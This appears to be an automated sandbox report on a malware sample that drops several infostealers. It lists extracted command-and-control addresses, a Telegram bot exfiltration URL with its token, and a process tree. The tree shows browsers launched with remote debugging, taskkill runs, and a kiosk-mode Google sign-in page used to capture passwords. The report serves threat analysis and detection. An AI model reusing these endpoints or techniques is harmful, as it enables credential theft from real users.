Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-12-2024 09:28

General

  • Target

    file.exe

  • Size

    1.7MB

  • MD5

    1b850dd61dfbb0fb8782987f0b6f365c

  • SHA1

    a6d5c487ba7c8417ac4f2f6ab46a560f20ca404d

  • SHA256

    a5e020f3d85998f530607c7e83d229449befec6e9800c5ae6f9cdd76659da0ef

  • SHA512

    38da11e6e7e1c09d892cf79ee0c51a560f6caf7dc748c04200c5fb8dea3fad2b8f5d33041863bf4b9ee6e54b9dfaf57f823fd1c63c0147955952650b6e013c96

  • SSDEEP

    49152:73VNOgSGRS4msDkbB/ILDKaT8X/5/8DYIi5huJEfexQPt:JyeS4ms42H5TU/h8DYIiuE2xQPt

Malware Config

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://powerful-avoids.sbs

https://motion-treesz.sbs

https://disobey-curly.sbs

https://leg-sate-boat.sbs

https://story-tense-faz.sbs

https://blade-govern.sbs

https://occupy-blushi.sbs

https://frogs-severz.sbs

https://salve-windp.cyou

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7912788699:AAGD1HW4P2288HKKYEhpShtetd37D8GqFZo/sendDocument?chat_id=7781867830&caption=%F0%9F%92%A0DOTSTEALER%F0%9F%92%A0%0A%F0%9F%92%ABNew%20log:%0AIP:%20181.215.176.83%0AUsername:%20Admin%0ALocation:%20United%20Kingdom%20[GB],%20London,%20Englan

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 15 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 30 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3100
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
      2⤵
      • Uses browser remote debugging
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4136
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e021cc40,0x7ff8e021cc4c,0x7ff8e021cc58
        3⤵
          PID:4888
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:2
          3⤵
            PID:3560
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1656,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3
            3⤵
              PID:756
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1908,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2224 /prefetch:8
              3⤵
                PID:3292
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
                3⤵
                • Uses browser remote debugging
                PID:1500
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:1
                3⤵
                • Uses browser remote debugging
                PID:4552
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4584,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4300 /prefetch:1
                3⤵
                • Uses browser remote debugging
                PID:4004
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4792,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:8
                3⤵
                  PID:4076
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5004,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5040 /prefetch:8
                  3⤵
                    PID:2544
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4860,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:8
                    3⤵
                      PID:3724
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5136 /prefetch:8
                      3⤵
                        PID:868
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4844 /prefetch:8
                        3⤵
                          PID:4064
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5088 /prefetch:8
                          3⤵
                            PID:3600
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5284,i,1287257116006090472,1729894612326599823,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5256 /prefetch:2
                            3⤵
                            • Uses browser remote debugging
                            PID:4860
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                          2⤵
                          • Uses browser remote debugging
                          • Enumerates system info in registry
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                          • Suspicious use of FindShellTrayWindow
                          PID:3500
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8e05a46f8,0x7ff8e05a4708,0x7ff8e05a4718
                            3⤵
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2000
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
                            3⤵
                              PID:1932
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 /prefetch:3
                              3⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4052
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
                              3⤵
                                PID:3656
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                                3⤵
                                • Uses browser remote debugging
                                PID:4112
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
                                3⤵
                                • Uses browser remote debugging
                                PID:2932
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
                                3⤵
                                • Uses browser remote debugging
                                PID:1712
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2156,8854212847496109737,16734698774338015627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
                                3⤵
                                • Uses browser remote debugging
                                PID:4048
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\IEHJDGIDBA.exe"
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:4816
                              • C:\Users\Admin\Documents\IEHJDGIDBA.exe
                                "C:\Users\Admin\Documents\IEHJDGIDBA.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                PID:3756
                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                  4⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Adds Run key to start application
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1768
                                  • C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3540
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 1456
                                      6⤵
                                      • Program crash
                                      PID:4896
                                  • C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1011944001\4XYFk9r.exe"
                                    5⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Checks processor information in registry
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:412
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp843A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp843A.tmp.bat
                                      6⤵
                                        PID:1424
                                    • C:\Users\Admin\AppData\Local\Temp\1011945001\7d827da348.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1011945001\7d827da348.exe"
                                      5⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3184
                                    • C:\Users\Admin\AppData\Local\Temp\1011946001\4caa2bc894.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1011946001\4caa2bc894.exe"
                                      5⤵
                                      • Enumerates VirtualBox registry keys
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3360
                                    • C:\Users\Admin\AppData\Local\Temp\1011947001\befb3070da.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1011947001\befb3070da.exe"
                                      5⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2824
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1528
                                        6⤵
                                        • Program crash
                                        PID:5788
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1560
                                        6⤵
                                        • Program crash
                                        PID:5812
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1560
                                        6⤵
                                        • Program crash
                                        PID:5896
                                    • C:\Users\Admin\AppData\Local\Temp\1011948001\8373d2c99b.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1011948001\8373d2c99b.exe"
                                      5⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      PID:3888
                                    • C:\Users\Admin\AppData\Local\Temp\1011949001\255e8fdf1c.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1011949001\255e8fdf1c.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:4664
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /F /IM firefox.exe /T
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2252
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /F /IM chrome.exe /T
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2392
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /F /IM msedge.exe /T
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:428
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /F /IM opera.exe /T
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3600
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /F /IM brave.exe /T
                                        6⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4080
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                        6⤵
                                          PID:5108
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                            7⤵
                                            • Checks processor information in registry
                                            • Modifies registry class
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            • Suspicious use of SetWindowsHookEx
                                            PID:2588
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c92d03d3-5bd3-4826-8330-94a989c1765b} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" gpu
                                              8⤵
                                                PID:5068
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6868158a-aad4-48e6-a01e-a34d9e9fcac0} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" socket
                                                8⤵
                                                  PID:4456
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2880 -childID 1 -isForBrowser -prefsHandle 3404 -prefMapHandle 3312 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0ea2aab-dd98-435e-a2a7-64302b20be62} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" tab
                                                  8⤵
                                                    PID:1416
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4080 -childID 2 -isForBrowser -prefsHandle 4076 -prefMapHandle 4072 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7051b04b-db35-4de3-9a7b-88685f9880c1} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" tab
                                                    8⤵
                                                      PID:4080
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4840 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4832 -prefMapHandle 4828 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {61b9619a-61d4-4d4e-81d6-236eb839b578} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" utility
                                                      8⤵
                                                      • Checks processor information in registry
                                                      PID:5476
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5672 -childID 3 -isForBrowser -prefsHandle 5656 -prefMapHandle 5660 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a4a49ed-0de9-40f8-b8cd-04f1ee4684f4} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" tab
                                                      8⤵
                                                        PID:1220
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5580 -childID 4 -isForBrowser -prefsHandle 5796 -prefMapHandle 5800 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1675a1c4-0603-4abe-99a4-26c8c6c59e2e} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" tab
                                                        8⤵
                                                          PID:1260
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5972 -childID 5 -isForBrowser -prefsHandle 5980 -prefMapHandle 5984 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e101b31f-71c4-4694-b855-b7bf2d56f76e} 2588 "\\.\pipe\gecko-crash-server-pipe.2588" tab
                                                          8⤵
                                                            PID:4240
                                                    • C:\Users\Admin\AppData\Local\Temp\1011950001\38a103eec7.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1011950001\38a103eec7.exe"
                                                      5⤵
                                                      • Modifies Windows Defender Real-time Protection settings
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Windows security modification
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
